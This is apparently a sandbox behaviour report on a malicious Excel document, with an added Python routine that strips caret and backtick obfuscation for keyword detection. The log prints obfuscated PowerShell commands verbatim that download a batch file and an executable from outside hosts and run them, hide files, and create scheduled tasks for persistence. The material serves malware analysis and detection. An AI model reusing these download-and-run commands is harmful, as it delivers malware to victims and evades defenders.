Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Mutant created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_dQvCIzmEBFgxmMuIEE
Source: C:\Users\user\AppData\Roaming\sp.exe Mutant created: \Sessions\1\BaseNamedObjects\614c1de794e5e2f8f0d3a4fae3ccc083
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD690.tmp Jump to behavior
Source: spetsifikatsiya.xls OLE indicator, Workbook stream: true
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
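The command line above layers two escaping mechanisms to defeat string matching: cmd.exe carets (powershe^l^l) and PowerShell backticks (stARt`-slE`Ep), which is exactly what the SUSP_PowerShell_Caret_Obfuscation_2 rule fired on for pd.bat and the capture. Both escapes are no-ops once removed, so a detection pipeline should normalise before matching keywords. The Python below is an added example written for this report, not the rule's or Joe Sandbox's code; the keyword list is my own choice. It applies the cmd layer and then the PowerShell layer in the order the shells do, and it deliberately leaves backticks inside single-quoted strings alone, because PowerShell treats them literally there (the '$e`nV:T`EMP' destination is never expanded).

```python
# Keywords worth flagging once escaping has been removed. Chosen for this
# example; extend to taste (these are not from any published rule).
KEYWORDS = ("powershell", "start-sleep", "move-item", "invoke-expression",
            "downloadstring", "-w 1")


def strip_cmd_carets(cmdline):
    """Undo cmd.exe escaping: outside double quotes '^X' becomes 'X'.
    Inside a double-quoted span cmd.exe treats the caret literally."""
    out, in_dq, i = [], False, 0
    while i < len(cmdline):
        c = cmdline[i]
        if c == '"':
            in_dq = not in_dq
        elif c == "^" and not in_dq:
            i += 1                      # drop the caret, keep the escaped char
            if i < len(cmdline):
                out.append(cmdline[i])
            i += 1
            continue
        out.append(c)
        i += 1
    return "".join(out)


def strip_ps_backticks(script):
    """Undo PowerShell backtick escaping outside single-quoted strings.
    Inside '...' a backtick is literal, so '$e`nV:T`EMP' stays as written.
    Escape sequences such as `n are not expanded: only identifiers (cmdlet
    and parameter names) matter for keyword matching."""
    out, in_sq, i = [], False, 0
    while i < len(script):
        c = script[i]
        if c == "'":
            in_sq = not in_sq
        elif c == "`" and not in_sq:
            i += 1
            if i < len(script):
                out.append(script[i])
            i += 1
            continue
        out.append(c)
        i += 1
    return "".join(out)


def normalize_cmdline(raw):
    """cmd.exe parses first, then hands the result to powershell.exe."""
    return strip_ps_backticks(strip_cmd_carets(raw))


def analyze(raw):
    """Return the normalised line, the keywords it contains, and whether any
    escaping was present that changed nothing once removed (a classic tell)."""
    normalized = normalize_cmdline(raw)
    lowered = normalized.lower()
    return {
        "normalized": normalized,
        "hits": [k for k in KEYWORDS if k in lowered],
        "obfuscated": normalized != raw,
    }


# The process-creation line from this report, copied verbatim.
SAMPLE = ("cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; "
          "Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'")

if __name__ == "__main__":
    print(analyze(SAMPLE))
```

Case-folding after normalisation matters as much as the escape removal: PowerShell resolves stARt-slEEp to Start-Sleep, so a rule that only matches the canonical spelling misses the sample either way.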
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write (UTF-16LE console buffer; readable fragments only, non-printable bytes dropped): V' does not exist | At line:1 char:271 | ItemCommand (fragment) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write (second error, same form): V' does not exist | At line:1 char:191 | ocationCommand (fragment) Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write (readable fragments, in buffer order): C:\Users\Albus\Documents> | mode | 18,1 (echoed command: mode 18,1) Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: C:\Users\Albus\Documents> | color | FE (echoed command: color FE) Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: C:\Users\Albus\Documents> | setlocal Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: for | /F | "tokens=4-5 delims=. " | %i in | ('ver') do | set | VERSION=%i.%j (echoed command: for /F "tokens=4-5 delims=. " %i in ('ver') do set VERSION=%i.%j) Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: C:\Users\Albus\Documents> | set | VERSION=6.1 (echoed command: set VERSION=6.1) Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: if | "6.1" == "10.0" | ( (echoed command: if "6.1" == "10.0" ( ) Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H........................................................d..U...(................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H...............e.c.h.o.........}..v............................H...............................x.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H............... .".W.i.n.d.o.w.s. .1.0. .d.e.t.e.c.t.e.d.". . .e.c.h.o..........DC.............H.*.....0....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H............... ..... ..........DC......................e..U....................DC.............x.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H...............r.e.g...........}..v............................H.................................*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .........................................................................e..U...r.e.g............DC.....................b....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................1.>.....................................te..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................n.u.l. .................................te..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... .........d1.......................e..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................t.i.m.e.o.u.t...}..v............................(.................................*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ./.t. .2. . ............................j..U...t.i.m.e..........DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................1.>......................................j..U... ./.t. ..........DC.............X.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............n.u.l. ..................................j..U... ./.t. ..........DC.............X.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\............... ..... .........d1......................te..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............s.c.h.t.a.s.k.s.}..v............................\...............................X.*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\........................................................j..U...s.c.h.t..........DC.....................v....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............1.>.....................................4j..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............n.u.l. .................................4j..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\............... ..... .........d1.......................j..U....................DC.............X.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............t.i.m.e.o.u.t...}..v............................(.................................*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\............... ./.t. .3. . ...........................dj..U...t.i.m.e..........DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............1.>.....................................Tj..U... ./.t. ..........DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............n.u.l. .................................Tj..U... ./.t. ..........DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\............... ..... .........d1......................4j..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............r.e.g...........d1......................4j..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\.......................................................dj..U...r.e.g............DC.....................T....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\........................................................d..U......J.............DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............). ......................................d..U......J.............DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\................................DC.....................$d..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............................`{.J.....................k..U....$.J..............C.............(.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............X.*.....2..................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............i.f. ...........`{.J....................$d..U...X%.J.............DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............".6...1.". .=.=. .".6...3.". ............d..U...i.f. ............DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............(................DC.............................................d1.........v......*........................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\........................................................d..U...(................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............e.c.h.o.........}..v............................\.......j.......................x.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\............... .".W.i.n.d.o.w.s. .8...1. .d.e.t.e.c.t.e.d.". . .c.h.o..........DC.............H.*.....2....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... ..........DC......................e..U....................DC.............x.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................r.e.g...........}..v....................................~.........................*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\............... ..... .........d1.......................e..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............t.i.m.e.o.u.t...}..v............................(.................................*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\............... ./.t. .2. . ............................j..U...t.i.m.e..........DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............1.>......................................j..U... ./.t. ..........DC.............X.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............s.c.h.t.a.s.k.s.}..v............................\...............................X.*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............t.i.m.e.o.u.t...}..v............................(.................................*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............".6...1.". .=.=. .".6...2.". ............d..U...i.f. ............DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............e.c.h.o.........}..v............................\.......M.......................x.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\............... .".W.i.n.d.o.w.s. .8. .d.e.t.e.c.t.e.d.". . ...e.c.h.o..........DC.............H.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\............... ..... ..........DC......................e..U....................DC.............x.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............r.e.g...........}..v............................\......._.........................*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\........................................................e..U...r.e.g............DC.....................b....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............1.>.....................................te..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............n.u.l. .................................te..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............t.i.m.e.o.u.t...}..v............................(.................................*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............s.c.h.t.a.s.k.s.}..v............................\...............................X.*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............t.i.m.e.o.u.t...}..v............................(.................................*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............".6...1.". .=.=. .".6...1.". ............d..U...i.f. ............DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............C.m.d...........................................(................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\.......................................................Dd..U...C.m.d............DC............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............). ..............DC......................d..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ...................J............T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d.......*.......*.....x.*.....B....................... Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ........................................(.P.............,....................................................................................... Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ................................X.......(.P.............................Y.......................................................................
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ....................\...........E.R.R.O.R.:. ...........................N.......................................h.#.............................
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ....................\...........E.R.R.O.(.P.............................T...............................................j.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\sp.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\sp.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\sp.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\sp.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\sp.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: spetsifikatsiya.xls Virustotal: Detection: 13%
Source: sp.exe String found in binary or memory: id-cmc-addExtensions
Source: sp.exe String found in binary or memory: set-addPolicy
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
Source: unknown Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
Source: unknown Process created: C:\Windows\System32\mode.com mode 18,1
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
Source: unknown Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
Source: unknown Process created: C:\Users\user\AppData\Roaming\sp.exe 'C:\Users\user\AppData\Roaming\sp.exe'
Source: unknown Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp'
Source: unknown Process created: C:\Users\user\AppData\Roaming\sp.exe {path}
Source: unknown Process created: C:\Users\user\AppData\Roaming\sp.exe {path}
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe 'C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe'
Source: unknown Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmp4F59.tmp'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe {path}
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe {path}
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe 'C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe'
Source: unknown Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpC70.tmp'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 18,1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\sp.exe 'C:\Users\user\AppData\Roaming\sp.exe'
Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp'
Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Users\user\AppData\Roaming\sp.exe {path}
Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Users\user\AppData\Roaming\sp.exe {path}
Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe 'C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe'
Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe 'C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe'
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmp4F59.tmp'
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe {path}
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe {path}
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpC70.tmp'
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\sp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
